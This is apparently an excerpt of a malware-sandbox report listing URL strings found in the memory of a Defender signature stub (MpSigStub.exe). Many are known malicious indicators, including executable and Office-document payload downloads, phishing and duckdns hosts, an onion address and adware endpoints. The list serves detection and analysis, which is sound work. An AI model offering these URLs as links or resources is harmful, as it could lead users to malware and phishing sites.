Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://msonlineservers.tk/parcel/dugdhl.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://muacangua.com/wp-admin/o_n/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://muahangvn.blogspot.com
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://muqo.g
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://musah.info/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://music.cn.yahoo.com/lyric.html?p=%s
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://music.emmigo.in/?r=wmp&title=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://music.soso.com/q?sc=mus&w=%s
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://music.tfeed.info/?r=wmp&title=
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://muzdownload.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://my-save-img.ru/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://my-save-img.ru/ip2.php
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://my.pcmaps.net/api/report?type=
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://mybestofferstoday.com/cgi-bin/main.cgi?__rnd__
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp String found in binary or memory: http://mydirecttube.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://myip.dnsomatic.com
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://myliverpoolnews.cf/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://myplanet.group/xuxzryvq1/ind.html
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://myredir.net/K_
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://mysearchpage.biz/customizesearch.html
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://mysearchpage.biz/home.html
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://mytube.4l.cl/?id=4&watch=zryxo7
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://mytube.hs.vc/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://n5wo.lolitasexfootube.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://n7pv51t.sed.odtllc.net
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://naka4al.ru/tds/go.php?sid=1
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp String found in binary or memory: http://name.cnnic.
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp String found in binary or memory: http://name.cnnic.cn/cn.dll
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp String found in binary or memory: http://name.cnnic.cn/cn.dll?charset=utf-8&name=
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp String found in binary or memory: http://name.cnnic.cn/cn.dll?pid=
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://nameservicehosting3.in//load.php?spl=javad
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://nathannewman.org/wp-content/themes/boldnews/includes/js/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://nation.eromariaporno.net/pc/page/set_reg.php?af_code=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://navigation.iwatchavi.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://navsmart.info
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://ncb.com.pe/media-views/pool=67/frenchclicks/
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: http://netmahal.portalsepeti.com/?bd=sc&oem=ntsvc&uid=
Source: MpSigStub.exe, 00000024.00000003.6326616398.00000197A3216000.00000004.00000001.sdmp String found in binary or memory: http://network.nocreditcard.com/DialHTML
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://network.nocreditcard.com/DialHTML/OSB/final.php3
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://network.nocreditcard.com/DialHTML/OSB/wait.php3
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://nevefe.com/wp-content/themes/calliope/wp-front.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://nevergreen.net/456
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://new.beahh.com/startup.php
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: http://newglobalinternationalsewdifwefkseifodwe.duckdns.org/vbc/document.doc
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://news.7654.com/mini_new3
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://newsystemlaunchwithnewmethodforserverfil.duckdns.org/document_v_001241.doc
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://nfe-fazenda.tk/mml/filenet.jpg
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://nfinx.info
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://nicescroll.areaaperta.com
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://nigera21.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://nimabi7.gnway.cc/seoul/kics/login.html
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://nixtin.us/cj/cjpilx.doc
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: http://nmextensions.com/preconfirm.php?sid=0&aid=0&said=0
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp String found in binary or memory: http://no.sinabc.net/abc.exe
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://novacf.org/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://novoteka-ru.uimserv.net.pichunter-com.genuinecolors.ru:8080/comdirect.de/com6i3re47t.de/earth
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://nownowsales.com/wp-admin/ulpbz/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://nq4k.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://ns1.natalnosso.info:8082/windows.pac
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Errorx
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://nt010.cn/e/j.js
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://nta.hopto.org/mpa/nd.doc
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp String found in binary or memory: http://nthnuest.com:40000/tickets
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: http://nutricaoedesenvolvimento.com.br/i/i.sct
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp String found in binary or memory: http://o1.o1wy.com/miss/
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp String found in binary or memory: http://o1a.cn/Counter/NewCounter.asp?Param=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://ocean-v.com/wp-content/
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://oddbods.co.uk/D6yd9x/
Source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp String found in binary or memory: http://offensiveware.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://office-archive-input.com/scan.wbk?raw=true
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://office-cleaner-indexes.com/project.rtf
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://office-cleaner-indexes.com/update.doc
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://office-service-secs.com/blm.task
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://office.otzo.com/office.sct
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://officefiletransferintergration.mangospot.net/..-.............................................
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ogirikidanielifeanyi.com/wp-content/upgrade/neworder.html
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://ogp.me/ns
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://ogrc.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://omstreaming.net/omunelegende/xxx.min.js
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://on5.biz/docs/home/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://onecs-live.azureedge.net
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://oneprivatecloudshareandfileprotectagenci.duckdns.org/receipt/invoice_651253.doc
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://online-docu-sign-st.com/yytr.png
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp String found in binary or memory: http://online-game-group.ru/download.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://online.pdf.com.tropicaldesign.com.br/)
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://online2you.org/search.php?sid=1
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://onlinesearch4meds.com
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://oo.shmtb.info:888/phone.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://opendownloadmanager.com/privacy-policy.html
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://openym.info/pdf/
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://orcult.0lx.net/tcgeneration.htmg
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://os.tiviviv.com/Vittalia/
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://os.tiviviv.com/Vittalia/x
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://outfish.bounceme.net/outl.dot
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/1pyr308vbgz)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/6gex303pfnn)
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/QoHbJ
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/gwzp304opw4)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/gxqw308htwv)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/qiml30afntj)
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/tdiy30flmvv
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://owwwc.com/mm/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://p.b69kq.com/
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://p.estonine.com
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://p.iask.com/p?k=%s
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://p.k3qh4.com/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://p.netund.com/go/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/p?w=%s
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://p6920.cloudserver255.com/0az7vjb9jbefbkmu#########
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://p772utd.playerskate.pw/31-3r7y89e0ecb9c6_8fo0f3f7-02-c1c_f4a_b_f-12/6/ed9678f1bc90f85b7c845b8
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: http://packetstorm.securify.com/0010-exploits/unicodexecute2.pl
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://padgettconsultants.ca/tau.gif
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://pads289.net
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://painel.moboymoboy.site/paste.php?pw=
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://pancern.scotpaker.com.br/busterinjetc.zip
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://pankus.3utilities.com/bars/banner/decipher/preparations/mxdmfq.dot
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://partners.sena.com/doc/inv-
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://passagensvhc.online/66.rtf
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp String found in binary or memory: http://pastebin.com/raw/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://pastebin.com/raw/L774bn1U
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://pastebin.com/raw/L774bn1Ux
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://patriciasmith.co.za/excelfolder/pdffiles)
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://patvenzklito.tk/wp/wp-includes/images/100.png
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://paufderhar07ol.ru.com/bb.html
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://pc-scan-online.com/l2.php?t=
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp String found in binary or memory: http://pcvark.com
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://perfectequipments.com/bm1/.tmp/.1.jstype=text/javascript
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://pettingmovefilehost.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://pettingmovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp String found in binary or memory: http://philippelaurent.org/rechnung/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://phimshock-share123vn.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://pic-pic.pw
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://pic.sogou.com/pics?query=%s
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://pig.zhongsou.com/helpsimple/help.htm
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://pig.zhongsou.com/pig3/dealip.asp?aa=%s&bb=%s
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: http://pilasto.host/po.exe
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp String found in binary or memory: http://pilinno.info/cpi/promo.exe
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://ping.180solutions.com
Source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp String found in binary or memory: http://ping.bizhi.sogou.com/repair.gif
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://pingakshotechnologies.com/vicaaralife/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://pirsl.com.au/signatures/new.jpg
Source: MpSigStub.exe, 00000024.00000003.6326616398.00000197A3216000.00000004.00000001.sdmp String found in binary or memory: http://pki.digidentity.eu/validatie0
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://pl2.txt.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://plaintexw.com/xx.dll
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: http://planilha.webcindario.com/planilha
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://play.videosongplayer.com/
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://playsong.mediasongplayer.com/
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp String found in binary or memory: http://plugin-install.info/
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://plugin-installer.com/
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://plugin-installer.info/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://pmevents.co.in/nd/index.php)
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://pmxmrnull.dynu.net:
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp String found in binary or memory: http://policy.camerfirma.com0
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://polifile.co/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://polk.freedynamicdns.org/boot/key.html
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://pomphrett.co.uk/c7fb/install/language/verouiller.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://popall.com/lin/bbs.htm?code=talking&mode=1
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://poppy97.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://portal.usanativ.com/sites/default/files/nativsetup.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://portalconnectme.com/56778786598.doc
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://portoseguropromissao.com.br/wp-content/uploads/revslider/templates/80s/z/z/z/po.zip.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://post.medusaranch.com/abonento9.exe
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://potosxylogicalnreinforcementagency4thsdy.duckdns.org/document/
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://ppdb2.stifar.ac.id/xwtaxkjqnq/
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: http://private0091111.duckdns.org/qagj/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://privateinvestigatorkendall.com/fo9cwuvlqwua
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://protect.advancedcleaner.com/MjY5Mw==/2/
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://protect.spyguardpro.com/MTkyNDE=/2/
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://prs.payperdownload.nl/radius/dialer_admin/geoip.asp
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: http://psget.net/GetPsGet.ps1x
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://pssquared.com/invoice-status/tracking-number-and-invoice-of-your-order/
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://psynergi.dk/data
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ptnetproject.info/yrniii/yrniii/yrniii/yrniii/index.php
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://pubs.vmware.com
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://pulp99.com/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://pulp99.com/1.rtf
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://purelyrighteous.com/redirect/amvubmlmzxiubw9uy3jpzwzmqde4mjuuy29t
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://pursuitvision.com/templates/pursuitvision/images/hybrid-app/ms
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://pusat-hacing.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://pznjaslo.pl/wp-content/outstanding-invoices/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://q-i-e-n.com/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://qiiqur.com/frix.exe
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://quantsa.ru/?de
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://quickinstallpack.com/quickinstall/order.php?qad=cln&qld=
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://quickuploader.xyz/Kalkkulerne.exe
